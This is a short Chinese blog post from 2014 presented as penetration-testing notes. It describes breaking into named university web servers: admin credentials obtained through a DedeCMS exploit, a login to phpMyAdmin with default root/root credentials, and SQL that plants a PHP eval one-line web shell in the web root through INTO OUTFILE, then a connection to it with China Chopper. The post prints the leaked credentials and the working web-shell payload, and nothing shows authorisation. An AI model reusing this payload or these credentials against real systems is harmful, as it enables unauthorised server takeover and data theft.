滲透測試筆記
今天朋友在入侵織夢的網站系統,通過最新的Exp獲得了織夢后臺的賬號和密碼
賬號:admin
密碼:abc123456
但是,找來找去找不到后臺,就讓我提權試試。
我看了下:http://pxc.ncist.edu.cn/dede/
后臺被刪除了!怎么辦??
google hack也沒找到后臺
后來,我試了試這個網站:http://zsjy.ncist.edu.cn/phpmyadmin
輸入默認MySql賬號與密碼:
賬號:root
密碼:root
居然進去了:
接下來就是phpmyadmin提權了:
我的思路是:
1.先爆出php服務器www的路徑
2.然后通過將php一句話插入數據庫再導出到www路徑
通過google hack爆到路徑:D\www\
呵呵,接下來就執行sql語句:
CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL ); INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>'); SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php'; |
這段sql意思是:
1.在mysql數據庫中建一張表叫xss,在xss表中生成一個field(字段)叫xss1
2.將php一句話木馬插入數據庫中的xss1字段處
3.將數據庫中xss1字段的內容導出到d:\www\x.php文件中
這下,通過chopper連接x.php小馬得到shell:
posted on 2014-04-24 10:21 順其自然EVO 閱讀(509) 評論(0) 編輯 收藏 所屬分類: 測試學習專欄 、安全性測試